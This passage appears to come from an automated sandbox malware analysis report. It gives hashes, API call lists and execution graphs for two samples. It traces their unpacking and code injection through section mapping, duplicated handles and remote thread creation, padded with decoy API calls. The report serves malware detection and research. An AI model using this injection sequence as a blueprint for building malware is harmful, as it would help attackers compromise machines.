                                        • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                        • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                        • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                        • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                        • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                        • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                        • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                        • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                        • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                        • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                        • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                        • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                        • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B
                                        APIs
                                        • BuildCommDCBA.KERNEL32(00000000,?), ref: 004153B1
                                        • WritePrivateProfileStringA.KERNEL32(00417378,00417354,0041732C,0041731C), ref: 004153D5
                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004153DD
                                        • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 0041541D
                                        • GetComputerNameW.KERNEL32(?,?), ref: 00415431
                                        • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041543F
                                        • OpenJobObjectA.KERNEL32(00000000,00000000,004173A0), ref: 0041544E
                                        • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041545F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                        • String ID: -
                                        • API String ID: 113859268-2547889144
                                        • Opcode ID: ad612eebba40d6e8f493addfd08894c0b8485d4a8875d0888b2cb3aa7251e0aa
                                        • Instruction ID: 204a2022625e4fb3e4702eb5f8edaa10a17d11f6e745e2405329eac1171ae186
                                        • Opcode Fuzzy Hash: ad612eebba40d6e8f493addfd08894c0b8485d4a8875d0888b2cb3aa7251e0aa
                                        • Instruction Fuzzy Hash: 95210831A44348EBE720DFA4DC85BD97B70EB4C752F1180AAFA49AA1C0CAF459C4CF59
                                        APIs
                                        • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 004154D4
                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004154EF
                                        • HeapDestroy.KERNEL32(00000000), ref: 0041550E
                                        • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415516
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                        • String ID:
                                        • API String ID: 367530164-0
                                        • Opcode ID: fa0f3e0493c3b50bce5c50c212db6b9832cbc5cdcb4cec3faed1b1786864bbd5
                                        • Instruction ID: fa24f5b182106e8a66cc9c052caed5fc4614bc77b159341e0b6937d28379f147
                                        • Opcode Fuzzy Hash: fa0f3e0493c3b50bce5c50c212db6b9832cbc5cdcb4cec3faed1b1786864bbd5
                                        • Instruction Fuzzy Hash: 4B01A770A41508EBE750EBB4ED45BDA7BB8B70C346F404037EA0597281DA745D90CB59

                                        Execution Graph

                                        Execution Coverage:9.3%
                                        Dynamic/Decrypted Code Coverage:28.5%
                                        Signature Coverage:0%
                                        Total number of Nodes:172
                                        Total number of Limit Nodes:6
                                        execution_graph 3470 402e40 3472 402e37 3470->3472 3473 402edf 3472->3473 3474 4018e6 3472->3474 3475 4018f5 3474->3475 3476 40192e Sleep 3475->3476 3477 401949 3476->3477 3479 40195a 3477->3479 3480 401514 3477->3480 3479->3473 3481 401524 3480->3481 3482 4015c4 NtDuplicateObject 3481->3482 3490 4016e0 3481->3490 3483 4015e1 NtCreateSection 3482->3483 3482->3490 3484 401661 NtCreateSection 3483->3484 3485 401607 NtMapViewOfSection 3483->3485 3487 40168d 3484->3487 3484->3490 3485->3484 3486 40162a NtMapViewOfSection 3485->3486 3486->3484 3488 401648 3486->3488 3489 401697 NtMapViewOfSection 3487->3489 3487->3490 3488->3484 3489->3490 3491 4016be NtMapViewOfSection 3489->3491 3490->3479 3491->3490 3492 415960 3495 415530 3492->3495 3494 415965 3496 41553d 3495->3496 3497 415732 3496->3497 3498 4155f7 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3496->3498 3499 415740 SetCommState 3497->3499 3503 415759 3497->3503 3500 41565d 7 API calls 3498->3500 3499->3497 3501 415713 3500->3501 3502 41570a GetBoundsRect 3500->3502 3504 415723 3501->3504 3505 41571c PulseEvent 3501->3505 3502->3501 3506 415843 3503->3506 3507 415766 9 API calls 3503->3507 3504->3497 3505->3504 3518 415180 LocalAlloc 3506->3518 3514 415817 3507->3514 3511 415848 LoadLibraryA 3519 4151b0 GetModuleHandleW GetProcAddress VirtualProtect 3511->3519 3512 41589d 3520 4154a0 3512->3520 3514->3506 3515 4158a2 3516 4158d9 InterlockedDecrement 3515->3516 3517 4158ef 3515->3517 3516->3515 3517->3494 3518->3511 3519->3512 3521 4154c9 QueryDosDeviceA 3520->3521 3522 4154da 3520->3522 3521->3522 3531 415340 3522->3531 3525 4154f5 3534 415380 3525->3534 3526 4154ed FreeEnvironmentStringsA 3526->3525 3529 41551c 3529->3515 3530 41550c HeapDestroy GetNumaHighestNodeNumber 3530->3529 3532 415351 FatalAppExitA GetModuleHandleW 3531->3532 3533 415363 3531->3533 3532->3533 3533->3525 3533->3526 3535 41538d 3534->3535 3536 4153b9 3535->3536 3537 4153a8 BuildCommDCBA 3535->3537 3538 4153c1 WritePrivateProfileStringA FreeEnvironmentStringsA 3536->3538 3540 4153e3 3536->3540 3537->3540 3538->3540 3539 41546a 3539->3529 3539->3530 3540->3539 3542 415419 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3540->3542 3543 415370 3540->3543 3542->3540 3546 415300 3543->3546 3547 415329 3546->3547 3548 41531c SetEvent 3546->3548 3547->3540 3548->3547 3657 401542 3658 40153b 3657->3658 3659 4015c4 NtDuplicateObject 3658->3659 3665 4016e0 3658->3665 3660 4015e1 NtCreateSection 3659->3660 3659->3665 3661 401661 NtCreateSection 3660->3661 3662 401607 NtMapViewOfSection 3660->3662 3664 40168d 3661->3664 3661->3665 3662->3661 3663 40162a NtMapViewOfSection 3662->3663 3663->3661 3666 401648 3663->3666 3664->3665 3667 401697 NtMapViewOfSection 3664->3667 3666->3661 3667->3665 3668 4016be NtMapViewOfSection 3667->3668 3668->3665 3590 415867 3591 415870 LoadLibraryA 3590->3591 3599 4151b0 GetModuleHandleW GetProcAddress VirtualProtect 3591->3599 3594 41589d 3595 4154a0 15 API calls 3594->3595 3597 4158a2 3595->3597 3596 4158d9 InterlockedDecrement 3596->3597 3597->3596 3598 4158ef 3597->3598 3599->3594 3631 2c80001 3632 2c80005 3631->3632 3637 2c8092b GetPEB 3632->3637 3634 2c80030 3639 2c8003c 3634->3639 3638 2c80972 3637->3638 3638->3634 3640 2c80049 3639->3640 3641 2c80e0f 2 API calls 3640->3641 3642 2c80223 3641->3642 3643 2c80d90 GetPEB 3642->3643 3644 2c80238 VirtualAlloc 3643->3644 3645 2c80265 3644->3645 3646 2c802ce VirtualProtect 3645->3646 3648 2c8030b 3646->3648 3647 2c80439 VirtualFree 3651 2c804be LoadLibraryA 3647->3651 3648->3647 3650 2c808c7 3651->3650 3572 2dff054 3575 2dff065 3572->3575 3576 2dff074 3575->3576 3579 2dff805 3576->3579 3584 2dff820 3579->3584 3580 2dff829 CreateToolhelp32Snapshot 3581 2dff845 Module32First 3580->3581 3580->3584 3582 2dff854 3581->3582 3585 2dff064 3581->3585 3586 2dff4c4 3582->3586 3584->3580 3584->3581 3587 2dff4ef 3586->3587 3588 2dff500 VirtualAlloc 3587->3588 3589 2dff538 3587->3589 3588->3589 3652 2c80005 3653 2c8092b GetPEB 3652->3653 3654 2c80030 3653->3654 3655 2c8003c 7 API calls 3654->3655 3656 2c80038 3655->3656 3716 402dd0 3717 402ddc 3716->3717 3718 4018e6 8 API calls 3717->3718 3719 402edf 3717->3719 3718->3719 3612 4018f1 3613 4018f6 3612->3613 3614 40192e Sleep 3613->3614 3615 401949 3614->3615 3616 401514 7 API calls 3615->3616 3617 40195a 3615->3617 3616->3617 3549 2c8003c 3550 2c80049 3549->3550 3562 2c80e0f SetErrorMode SetErrorMode 3550->3562 3555 2c80265 3556 2c802ce VirtualProtect 3555->3556 3558 2c8030b 3556->3558 3557 2c80439 VirtualFree 3561 2c804be LoadLibraryA 3557->3561 3558->3557 3560 2c808c7 3561->3560 3563 2c80223 3562->3563 3564 2c80d90 3563->3564 3565 2c80dad 3564->3565 3566 2c80dbb GetPEB 3565->3566 3567 2c80238 VirtualAlloc 3565->3567 3566->3567 3567->3555 3703 401915 3704 40191a 3703->3704 3705 4018c6 3703->3705 3706 40192e Sleep 3704->3706 3707 401949 3706->3707 3708 401514 7 API calls 3707->3708 3709 40195a 3707->3709 3708->3709 3568 402f97 3569 4030ee 3568->3569 3570 402fc1 3568->3570 3570->3569 3571 40307c RtlCreateUserThread NtTerminateProcess 3570->3571 3571->3569 3693 402d7b 3694 402d38 3693->3694 3694->3693 3695 4018e6 8 API calls 3694->3695 3696 402dc7 3694->3696 3695->3696 3618 4014fe 3619 401506 3618->3619 3620 401531 3618->3620 3621 4015c4 NtDuplicateObject 3620->3621 3629 4016e0 3620->3629 3622 4015e1 NtCreateSection 3621->3622 3621->3629 3623 401661 NtCreateSection 3622->3623 3624 401607 NtMapViewOfSection 3622->3624 3626 40168d 3623->3626 3623->3629 3624->3623 3625 40162a NtMapViewOfSection 3624->3625 3625->3623 3627 401648 3625->3627 3628 401697 NtMapViewOfSection 3626->3628 3626->3629 3627->3623 3628->3629 3630 4016be NtMapViewOfSection 3628->3630 3630->3629

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 415530-415558 2 415560-415567 0->2 3 415569-41556b 2->3 4 41556f-415575 2->4 3->4 5 415577-415581 4->5 6 415586-415590 4->6 5->6 7 415592-41559e 6->7 8 4155a8-4155af 6->8 7->8 8->2 9 4155b1-4155b9 8->9 11 4155c0-4155c6 9->11 12 4155d4-4155db 11->12 13 4155c8-4155ce 11->13 14 4155e1-4155e8 12->14 15 4155dd 12->15 13->12 14->11 16 4155ea-4155f1 14->16 15->14 17 415732-41573e 16->17 18 4155f7-415708 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415740-41574e SetCommState 17->19 21 415713-41571a 18->21 22 41570a-41570d GetBoundsRect 18->22 24 415750-415757 19->24 25 415759-415760 19->25 26 415723-41572f 21->26 27 41571c-41571d PulseEvent 21->27 22->21 24->19 24->25 28 415843-415852 call 415180 25->28 29 415766-41583d GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesW GetConsoleAliasExesLengthA GetBinaryType GetLocaleInfoW FormatMessageA 25->29 26->17 27->26 34 415854-415865 28->34 35 41588d-415898 LoadLibraryA call 4151b0 28->35 29->28 37 415870-415880 34->37 42 41589d-4158ae call 4154a0 35->42 40 415882 37->40 41 415888-41588b 37->41 40->41 41->35 41->37 47 4158b0-4158b7 42->47 48 4158c3-4158c9 47->48 49 4158b9-4158bf 47->49 50 4158d0-4158d7 48->50 51 4158cb call 4151a0 48->51 49->48 54 4158e6-4158ed 50->54 55 4158d9-4158e0 InterlockedDecrement 50->55 51->50 54->47 57 4158ef-4158ff 54->57 55->54 59 415900-415910 57->59 60 415912 59->60 61 415919-41591c 59->61 60->61 61->59 62 41591e-415929 61->62 63 415930-415935 62->63 64 415937-41593d 63->64 65 41593f-415945 63->65 64->65 66 415947-415954 64->66 65->63 65->66
                                        APIs
                                        • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415602
                                        • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041561B
                                        • FindAtomW.KERNEL32(00000000), ref: 00415622
                                        • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041562A
                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415642
                                        • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415669
                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00415671
                                        • GetVersionExW.KERNEL32(?), ref: 0041567E
                                        • DisconnectNamedPipe.KERNEL32(?), ref: 00415691
                                        • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004156D6
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004156E5
                                        • LCMapStringA.KERNEL32(00000000,00000000,004173A8,00000000,?,00000000), ref: 004156FB
                                        • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 0041570D
                                        • PulseEvent.KERNEL32(00000000), ref: 0041571D
                                        • SetCommState.KERNELBASE(00000000,00000000), ref: 00415744
                                        • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415775
                                        • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415786
                                        • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041578E
                                        • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173D8,?,00000000), ref: 004157CE
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 004157D5
                                        • GetConsoleAliasExesLengthA.KERNEL32 ref: 004157DB
                                        • GetBinaryType.KERNEL32(004173E8,?), ref: 004157ED
                                        • GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004157F7
                                        • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041580A
                                        • LoadLibraryA.KERNELBASE(004173F4), ref: 00415892
                                        • InterlockedDecrement.KERNEL32(?), ref: 004158E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd
                                        Similarity
                                        • API ID: Console$CommFile$FormatInterlockedLengthReadStringType$AliasAliasesAtomAttributesBinaryBoundsBuildCompareConfigDecrementDefaultDisconnectEventExchangeExesFindInfoLibraryLoadLocaleMessageModeModuleMoveNameNamedOutputPathPipePulseRectSearchStateTimeVersion
                                        • String ID: k`$}$
                                        • API String ID: 777263412-956986773
                                        • Opcode ID: 9a6d517027ea327947a6227254bff5a0b99b091f86ca634d153418c31ef3e2ee
                                        • Instruction ID: 28d08a9e12edc1d56af3eee545ba5f80b0898f125747bb2d66328808cc3604cb
                                        • Opcode Fuzzy Hash: 9a6d517027ea327947a6227254bff5a0b99b091f86ca634d153418c31ef3e2ee
                                        • Instruction Fuzzy Hash: A4B1D071802924EBD721EB61EC48ADB7F79FF89351F41406AF50AA7150DB384A81CFAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 153 401514-401533 155 401524-40152f 153->155 156 401536-40156e call 401193 153->156 155->156 165 401570 156->165 166 401573-401578 156->166 165->166 168 401898-4018a0 166->168 169 40157e-40158f 166->169 168->166 172 401595-4015be 169->172 173 401896-4018a5 169->173 172->173 183 4015c4-4015db NtDuplicateObject 172->183 176 4018b4 173->176 177 4018ab-4018b0 173->177 176->177 178 4018b7 176->178 177->178 179 4018c5 178->179 180 4018bc-4018e3 call 401193 178->180 179->180 183->173 184 4015e1-401605 NtCreateSection 183->184 186 401661-401687 NtCreateSection 184->186 187 401607-401628 NtMapViewOfSection 184->187 186->173 190 40168d-401691 186->190 187->186 189 40162a-401646 NtMapViewOfSection 187->189 189->186 192 401648-40165e 189->192 190->173 193 401697-4016b8 NtMapViewOfSection 190->193 192->186 193->173 195 4016be-4016da NtMapViewOfSection 193->195 195->173 198 4016e0 call 4016e5 195->198
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 200 4014fe-401503 201 401531-40156e call 401193 200->201 202 401506-401511 200->202 212 401570 201->212 213 401573-401578 201->213 212->213 215 401898-4018a0 213->215 216 40157e-40158f 213->216 215->213 219 401595-4015be 216->219 220 401896-4018a5 216->220 219->220 230 4015c4-4015db NtDuplicateObject 219->230 223 4018b4 220->223 224 4018ab-4018b0 220->224 223->224 225 4018b7 223->225 224->225 226 4018c5 225->226 227 4018bc-4018e3 call 401193 225->227 226->227 230->220 231 4015e1-401605 NtCreateSection 230->231 233 401661-401687 NtCreateSection 231->233 234 401607-401628 NtMapViewOfSection 231->234 233->220 237 40168d-401691 233->237 234->233 236 40162a-401646 NtMapViewOfSection 234->236 236->233 239 401648-40165e 236->239 237->220 240 401697-4016b8 NtMapViewOfSection 237->240 239->233 240->220 242 4016be-4016da NtMapViewOfSection 240->242 242->220 245 4016e0 call 4016e5 242->245
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectView
                                        • String ID:
                                        • API String ID: 1652636561-0
                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 247 401542-40156e call 401193 256 401570 247->256 257 401573-401578 247->257 256->257 259 401898-4018a0 257->259 260 40157e-40158f 257->260 259->257 263 401595-4015be 260->263 264 401896-4018a5 260->264 263->264 274 4015c4-4015db NtDuplicateObject 263->274 267 4018b4 264->267 268 4018ab-4018b0 264->268 267->268 269 4018b7 267->269 268->269 270 4018c5 269->270 271 4018bc-4018e3 call 401193 269->271 270->271 274->264 275 4015e1-401605 NtCreateSection 274->275 277 401661-401687 NtCreateSection 275->277 278 401607-401628 NtMapViewOfSection 275->278 277->264 281 40168d-401691 277->281 278->277 280 40162a-401646 NtMapViewOfSection 278->280 280->277 283 401648-40165e 280->283 281->264 284 401697-4016b8 NtMapViewOfSection 281->284 283->277 284->264 286 4016be-4016da NtMapViewOfSection 284->286 286->264 289 4016e0 call 4016e5 286->289
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 291 401549-40156e call 401193 295 401570 291->295 296 401573-401578 291->296 295->296 298 401898-4018a0 296->298 299 40157e-40158f 296->299 298->296 302 401595-4015be 299->302 303 401896-4018a5 299->303 302->303 313 4015c4-4015db NtDuplicateObject 302->313 306 4018b4 303->306 307 4018ab-4018b0 303->307 306->307 308 4018b7 306->308 307->308 309 4018c5 308->309 310 4018bc-4018e3 call 401193 308->310 309->310 313->303 314 4015e1-401605 NtCreateSection 313->314 316 401661-401687 NtCreateSection 314->316 317 401607-401628 NtMapViewOfSection 314->317 316->303 320 40168d-401691 316->320 317->316 319 40162a-401646 NtMapViewOfSection 317->319 319->316 322 401648-40165e 319->322 320->303 323 401697-4016b8 NtMapViewOfSection 320->323 322->316 323->303 325 4016be-4016da NtMapViewOfSection 323->325 325->303 328 4016e0 call 4016e5 325->328
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 330 401557 331 40155b-40156e call 401193 330->331 332 40154f-401554 330->332 335 401570 331->335 336 401573-401578 331->336 332->331 335->336 338 401898-4018a0 336->338 339 40157e-40158f 336->339 338->336 342 401595-4015be 339->342 343 401896-4018a5 339->343 342->343 353 4015c4-4015db NtDuplicateObject 342->353 346 4018b4 343->346 347 4018ab-4018b0 343->347 346->347 348 4018b7 346->348 347->348 349 4018c5 348->349 350 4018bc-4018e3 call 401193 348->350 349->350 353->343 354 4015e1-401605 NtCreateSection 353->354 356 401661-401687 NtCreateSection 354->356 357 401607-401628 NtMapViewOfSection 354->357 356->343 360 40168d-401691 356->360 357->356 359 40162a-401646 NtMapViewOfSection 357->359 359->356 362 401648-40165e 359->362 360->343 363 401697-4016b8 NtMapViewOfSection 360->363 362->356 363->343 365 4016be-4016da NtMapViewOfSection 363->365 365->343 368 4016e0 call 4016e5 365->368
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
